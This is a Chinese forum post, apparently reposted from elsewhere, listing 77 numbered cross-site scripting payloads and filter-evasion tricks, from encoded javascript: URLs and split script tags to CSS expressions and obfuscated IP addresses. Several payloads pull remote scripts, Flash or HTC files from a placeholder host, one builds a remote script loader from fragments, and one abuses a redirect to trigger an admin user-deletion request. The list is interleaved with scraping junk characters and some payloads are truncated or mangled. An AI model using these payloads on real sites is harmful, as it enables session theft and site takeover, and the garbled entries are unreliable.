貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
# z( H( U' `! ^# Z7 ]/ P1 M8 L: v: f! D( O" l
(1)普通的XSS JavaScript注入
/ E% @+ e% q/ p* r" F! [4 y <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 t, g- a. c7 F! F! ~! n6 t! `' ~
- W' J. G4 j* ^. K) N* s+ `% p" g, T (2)IMG标签XSS使用JavaScript命令
+ l* P: e$ g1 B <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>4 I, y) |% T7 w' s+ {& t1 Q3 A
7 U( `9 U4 B, b7 `- \
(3)IMG标签无分号无引号
* I9 w( U1 K n: U <IMG SRC=javascript:alert(‘XSS’)>
( ?9 V7 X" A* p- f) l) }; ~1 o6 P
$ j) q( m- B( r5 x8 B+ b (4)IMG标签大小写不敏感
4 T9 N& B4 u! A, I3 W. |1 X <IMG SRC=JaVaScRiPt:alert(‘XSS’)>) r" c3 |0 F; J& c: d$ \* h7 {
3 c1 ]: t7 S3 F& o6 b7 ?# b/ A$ F! i (5)HTML编码(必须有分号)
/ E2 o( v( R5 K0 W7 x% C <IMG SRC=javascript:alert(“XSS”)>
; r7 u9 P, v( K5 j2 e4 ~5 b- W7 e" ~, l& l+ C, z! s
(6)修正缺陷IMG标签' W' n) y. D: K1 O) c' ^
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> A9 S* s* Z% r6 d
" s- \: X- P% i (7)formCharCode标签(计算器)" f* c' g& {# X0 b3 ?: K, z
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 I" P- e. i; Y3 U9 W9 ]& H6 K2 i( n( J# M) {) k8 c: |- T
(8)UTF-8的Unicode编码(计算器)
! B+ V7 z- A5 m" O <IMG SRC=jav..省略..S')>1 f8 I! S$ ^8 z5 P" v
3 r" g* S1 b$ n- Z
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)) V; g# P) r [1 a$ D1 a' i6 @/ Q
<IMG SRC=jav..省略..S')>
/ H; |& O ~* i" Y+ W& y
5 `& K3 ^. |6 Y; \ (10)十六进制编码也是没有分号(计算器)
: [( _; ^$ n& m" f <IMG SRC=java..省略..XSS')># e- r9 P) m/ N& f T! T
+ @- p3 P+ g5 `. i& c8 d8 G- {/ q
(11)嵌入式标签,将Javascript分开
9 s+ }6 w( r2 B. \ <IMG SRC=”jav ascript:alert(‘XSS’);”>. V9 ~2 j4 N6 h7 v: F# c- L5 E
+ x) b2 S8 p& M3 T U$ J
(12)嵌入式编码标签,将Javascript分开
! J* ]7 o5 {3 u# w; c& V <IMG SRC=”jav ascript:alert(‘XSS’);”>6 l6 U4 Q% [% E- Z8 }6 ? m
V. a% O2 Q+ C) {3 Z# u+ i (13)嵌入式换行符% O: ^' F0 T( V7 x$ l7 c
<IMG SRC=”jav ascript:alert(‘XSS’);”>) U5 i2 C* x$ B S- [" e
3 f* e' m' I$ A+ u% g, R! n: e
(14)嵌入式回车 n) U1 _: Z; N
<IMG SRC=”jav ascript:alert(‘XSS’);”>
% }" }1 i" p/ i* {( C
0 M/ g, R3 Z' ^4 S" ^) y (15)嵌入式多行注入JavaScript,这是XSS极端的例子
, u1 t4 p) N4 {' p/ c6 ~" L5 {2 c4 b" s <IMG SRC=”javascript:alert(‘XSS‘)”>, U6 J+ x1 k9 s0 Y! n; U* N
' a) V% i. E% s8 j& B3 d" d( [
(16)解决限制字符(要求同页面)4 S) }8 p' v, t, a
<script>z=’document.’</script>2 k4 O; `( C. c) x
<script>z=z+’write(“‘</script>
6 c; X/ C+ b+ a. T <script>z=z+’<script’</script>
6 `1 w( m( K* r& U0 p! g! U8 K# X <script>z=z+’ src=ht’</script>
# Y) c: m) r! m8 c" ^ <script>z=z+’tp://ww’</script>% N- [$ m G2 ^3 Z9 d
<script>z=z+’w.shell’</script>
/ z7 [* o" {. D0 P) i <script>z=z+’.net/1.’</script>+ w4 q! B$ N9 p9 M9 ]
<script>z=z+’js></sc’</script>! f( w, N. d V$ X& A4 B
<script>z=z+’ript>”)’</script>
- `. n: f6 M" G( q. E <script>eval_r(z)</script>! D4 Y) [& M, k+ v; J2 y
* \! w8 a% f) i `$ G& J- c
(17)空字符
3 T- {" T5 c/ n9 _/ x8 _ perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
/ j) z& N8 D, u P! Z! _
$ v1 f! h* t3 k) W _! A (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
7 {" ~' x' V) M z' A+ B3 _ perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# e% U' N9 p! R$ f2 U$ R* `4 M
2 h' ]0 z( y: \
(19)Spaces和meta前的IMG标签
9 _! g* g6 r5 Z! B7 e( m9 @ <IMG SRC=” � javascript:alert(‘XSS’);”>1 l. _: Z* f7 p. f8 l3 ^/ D/ [
! h2 Q2 J- i, B+ i& g: V
(20)Non-alpha-non-digit XSS" I. K6 E' i0 f
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
2 U$ \$ \& a% z9 X+ u) i/ [0 k/ y5 G1 \* v( j, C2 N- U2 s9 Q: ~7 M% X
(21)Non-alpha-non-digit XSS to 2
# F) T" f3 O1 j/ I" | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>; u3 k; a" c' j! T% A
v; i i" E/ y6 O
(22)Non-alpha-non-digit XSS to 3+ u5 \( B, ~* W1 R) k- @
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& W1 C( S) [5 \/ H1 `+ ]7 O& n: _1 F3 W
(23)双开括号( B- T3 i+ [0 e9 ]9 F, D
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
F* ~ D+ U1 T. L
' X/ g& B: j7 j+ @" ]2 x/ y# j; U (24)无结束脚本标记(仅火狐等浏览器)4 b% O$ i# [. y: k& F
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>4 J, G8 @- b5 r/ i5 i$ E: s
) ^( `$ P3 T6 U
(25)无结束脚本标记25 k& @4 D9 Y- I' P" n- C2 L
<SCRIPT SRC=//3w.org/XSS/xss.js>
2 _! x- k' a0 M6 p
; D4 e( ?9 U$ I0 Q$ M9 p4 U- y/ _ (26)半开的HTML/JavaScript XSS
. `2 [' ?# } u( g <IMG SRC=”javascript:alert(‘XSS’)”, s& H% i3 F7 E
. F' V3 X N' k" C1 J( A: K5 [ (27)双开角括号6 O6 `1 ]" r. F) h3 n
<iframe src=http://3w.org/XSS.html <
0 {2 ^& j2 H! V' w9 p: X0 @" n8 F0 u/ c& J4 W3 U6 e
(28)无单引号 双引号 分号
7 y# q( |% t3 o! g M <SCRIPT>a=/XSS/$ i9 G, _& J- S
alert(a.source)</SCRIPT>
3 V6 H5 G) h! i9 D- ^ `; e) b
4 ? H9 F2 ~4 o& ^6 f( r* O" {5 G (29)换码过滤的JavaScript
6 T- r' Q" y+ i3 e8 d \”;alert(‘XSS’);//# w j k* u; q
+ x, \% R8 `1 w (30)结束Title标签
/ C8 v9 x, |$ c# ] Y: q </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>0 l2 U) B8 v9 w
& E) [" U' u. C& A$ I& l: A. l
(31)Input Image
( B" q" _0 F0 \; T# ^ <INPUT SRC=”javascript:alert(‘XSS’);”>
* | O7 \' o! l5 t5 N q, O) n
/ A- i) G" ^ w* [* `% \ (32)BODY Image" \8 V/ D* V6 ^: _) J
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 K j& d$ |' M. g$ R v( l( [8 ~, q' j# K0 }9 {
(33)BODY标签1 r0 J; o7 A% s, A Z; H
<BODY(‘XSS’)>+ `- o% o) ]4 t1 N* ?7 [/ K
3 @$ r* A" F/ n2 C (34)IMG Dynsrc3 Q, C0 m. y) K/ @% k4 f
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
! E' ?7 h8 K( i; z- y! k2 M/ Y. F0 h( P
(35)IMG Lowsrc
/ i" q N1 a% }, n* P- Q <IMG LOWSRC=”javascript:alert(‘XSS’)”>
$ c6 s' [( p, X, ~: }. y( n/ \! r: }! p. U* M! e- N
(36)BGSOUND4 Y4 C4 ]6 ]0 ~* g- {
<BGSOUND SRC=”javascript:alert(‘XSS’);”>" Q( {; |# @+ R) f9 p
$ I3 m* X8 {) U2 |2 X( h (37)STYLE sheet
* F2 h v8 }, Z! }2 `% o9 C ] <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
/ {! `8 ?* V$ O) k8 K, J2 Q! |6 O: [$ ~9 H6 K: p% ]
(38)远程样式表
, [: p4 F& z7 X, G* X4 A- g2 ~ <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>. L# I% a( t, a; p
' O, [+ L( b' C1 C" y4 O (39)List-style-image(列表式)+ A& x! \6 \' i+ E2 u# N
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS$ m) N+ i) p4 z
3 T5 L) B/ \9 f9 f# R- Q( r9 k (40)IMG VBscript: G2 L% j3 R% F; [
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS* W7 d5 V0 ]7 K8 m* X8 q+ f
/ ~4 w2 l: b& p' d2 Z; m* p (41)META链接url+ y/ b6 v4 V; i" `0 x
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
. J- X5 j2 C$ C# L
9 a; P5 V: c( H: D' `1 s8 {+ B o (42)Iframe, @$ K: ~* g" p F" o6 a2 q: u H
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- D- h$ W% Z$ {9 e& a' U& I8 K* O7 t7 G3 y/ r O% _' y. l# y; u
(43)Frame0 O8 @% a+ z) c' g0 X. y8 u, H) F( }
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
9 E A, C: D5 {6 r* s5 K0 C& I. h# v( L. Q$ h& I" I0 f
(44)Table
4 ~% _5 [" E" v" Y8 O! Y( z <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
. A- B Y0 x0 [4 R r% ?; i$ w z( ], z* o3 b- ]1 S! u
(45)TD
4 ^( u! D+ W T3 E; Q* | <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
/ u# P% T* y+ Y3 e! o4 M! m. y! v: |# I, O9 \5 }' M
(46)DIV background-image2 Q1 v9 ^0 k" m" m
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
5 G+ _4 K0 _, R7 j
5 O4 |' K5 s( K4 z) ]. s( m (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)# L4 v. C! _/ U
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>- e1 |+ G: \4 ~
" k/ X5 t6 l7 o2 D) K/ n1 U (48)DIV expression
0 O6 a& L) I0 a- m4 Z% N <DIV STYLE=”width: expression_r(alert(‘XSS’));”>' z4 \; G8 z: e% C+ j: \
& g, A& s8 E7 u8 t: w* A o
(49)STYLE属性分拆表达
) n$ Z# k. F* K$ e* z1 x/ S6 e; J <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: A$ {" |$ |% `$ c4 e$ x5 E2 u2 w/ q5 Q. F0 U7 z* H
(50)匿名STYLE(组成:开角号和一个字母开头)
& o2 B$ q/ h& I8 _: S. J! K# A1 y <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>( a3 u# L$ E* c l, w* E( U
~6 _2 u* e5 q/ n7 ?' B& e
(51)STYLE background-image
7 }- [0 r4 G8 }$ B <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
) m9 V2 g, K% b8 b) X; m9 s4 H' ?* \8 w; ~8 o2 |
(52)IMG STYLE方式3 u0 H+ p Z0 K# f/ X
exppression(alert(“XSS”))’>3 [0 Q$ J! s0 J: Z5 j; F
7 M6 b& s+ v* d; e2 P0 A- X. ?; N (53)STYLE background
( W9 b7 j! U p ^' l <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
" o& B# b; E, e) ]: B d. |1 J# a. l+ B2 w
* N/ V6 D9 D' e! [ (54)BASE
& z( ]5 h4 G Z. ~5 g% ^8 A <BASE HREF=”javascript:alert(‘XSS’);//”>
" w6 k1 y6 v; O9 o0 H) ~4 L; A
. T' ?" J( O) S2 O; x( H8 E (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
& N9 F: t2 U9 D1 l* t: o% O1 Z <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>( v- A0 A9 p9 d7 D
' f$ _2 M0 h: j( |0 p# f
(56)在flash中使用ActionScrpt可以混进你XSS的代码. F4 D5 m" Q0 N0 t; C
a=”get”;2 G4 B7 \* \. j' m) x
b=”URL(\”";2 ]6 Z2 c4 C1 ?9 u+ H
c=”javascript:”;
- X# [1 E& y0 N" o, ?2 r% Z d=”alert(‘XSS’);\”)”;
; ~! n7 K0 G5 f) H" n eval_r(a+b+c+d);
. {$ o- R d1 S( y8 d: @& ^5 D. c; E% O
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
* I; k5 E, r$ z D <HTML xmlns:xss># H- A( M$ e9 x- B
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
3 C' x) [- }2 o F* m: F) v <xss:xss>XSS</xss:xss>
& p ]6 b6 P: T* w1 D </HTML>- e( ^' W/ B, C8 C7 m
+ ~2 h1 v) Y2 ^% T) q* W2 [; W4 b
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用' O3 T+ P% t4 C7 d" k
<SCRIPT SRC=””></SCRIPT># Q) O# k/ k0 x4 N& X. b( ~ w
" y. N2 T1 X. l8 I4 N (59)IMG嵌入式命令,可执行任意命令& A5 s8 N! O. k8 k4 u' Y9 z( E
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# e7 n; r7 t4 Q$ }' S; @% g* d" |. `' o
(60)IMG嵌入式命令(a.jpg在同服务器)
+ A3 `0 \3 }" n* a5 N3 ~ Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser5 u2 D f- J" e% b
1 i1 D h5 d( n/ B. a& t3 \+ |# @6 ^ (61)绕符号过滤
" k. I$ M5 ~5 I' U0 U; H: C' I: y8 V <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>4 P6 g9 }4 ~6 {7 O
' F; a p. F: x) i (62)' v' L6 n1 g3 D- x+ P2 }& T
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 E6 E1 s% W1 B
1 f, ^) r* ]1 y) [2 I. }+ k (63)& D3 @7 _ X& S+ z4 [: Y" m
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
0 a% D! c0 |6 Q" s& n) A
, x. }0 d" X% H/ W8 ?9 [8 ^ (64)8 C% _# _/ X1 k7 y7 ?
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>0 |$ j/ y9 v5 Q* r
9 x0 E; ]4 R" ]% k (65)
1 F' C! s0 g5 D( D) O <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
) x5 _; W$ u+ I2 P% h1 O
* u0 Y. f7 m7 y (66)
# d- U! r9 V( C7 K$ N- K <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>6 B, W! ? y0 p' L3 h [# E
. ~& T, X' t8 A- f' B (67)5 T# G, f# t# j+ X! S) D# f
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
0 c% ^0 B/ g" }9 k
& Z* b) x* E- G9 p, K (68)URL绕行+ V/ f8 C. r: s
<A HREF=”http://127.0.0.1/”>XSS</A>+ E' v/ a0 U1 @5 G0 f4 a' X. d
1 M1 x1 o% P8 i; {3 P (69)URL编码
( E- S' O! }8 Q! _6 U7 s( u8 C <A HREF=”http://3w.org”>XSS</A>
- S# O& t6 I8 i: h6 G6 p8 E5 A) o" j6 Z/ _
(70)IP十进制! D) z5 P* h2 J% P2 [' V( S) w# l
<A HREF=”http://3232235521″>XSS</A>
6 Z0 L% d0 k% l. Q) R
6 n; X* |6 Z3 z2 ` (71)IP十六进制: @8 O- h6 E7 s$ H1 l
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
! T9 O7 H+ K. s0 ^
8 j! W& G/ D- ^/ e$ } (72)IP八进制) E* ]$ I* R9 {% E9 Z
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
% X, q1 I) K% H3 P" E5 P; p. m7 ^- e5 W2 q" {
(73)混合编码* L& a% h) k; \( g5 z0 p0 n* I$ J; |9 B
<A HREF=”h. \$ j4 v; u2 @
tt p://6 6.000146.0×7.147/”">XSS</A>
0 h7 A9 ~) P2 u3 _) W% y0 B& p y8 l* r0 q0 m6 Q
(74)节省[http:]& B2 S7 k! A2 I7 m' ?/ R9 e
<A HREF=”//www.google.com/”>XSS</A>' v& b6 b; @/ j3 I
- _0 r: U/ v) g% y" V (75)节省[www]
5 t$ G e9 @* H6 }) Z" A <A HREF=”http://google.com/”>XSS</A>7 k' x9 `0 L# ]# _- H( \
. T# K* C1 y% \3 r: m% g5 J
(76)绝对点绝对DNS9 {. i. M, z a$ J& v' {; _
<A HREF=”http://www.google.com./”>XSS</A>
4 r; W1 I$ u. ?# E# X) W) x' m# K
( I7 L# d3 G# j: f! e/ @/ Q& {( b' ? (77)javascript链接
# Q2 h2 M- U+ ^2 [6 g <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对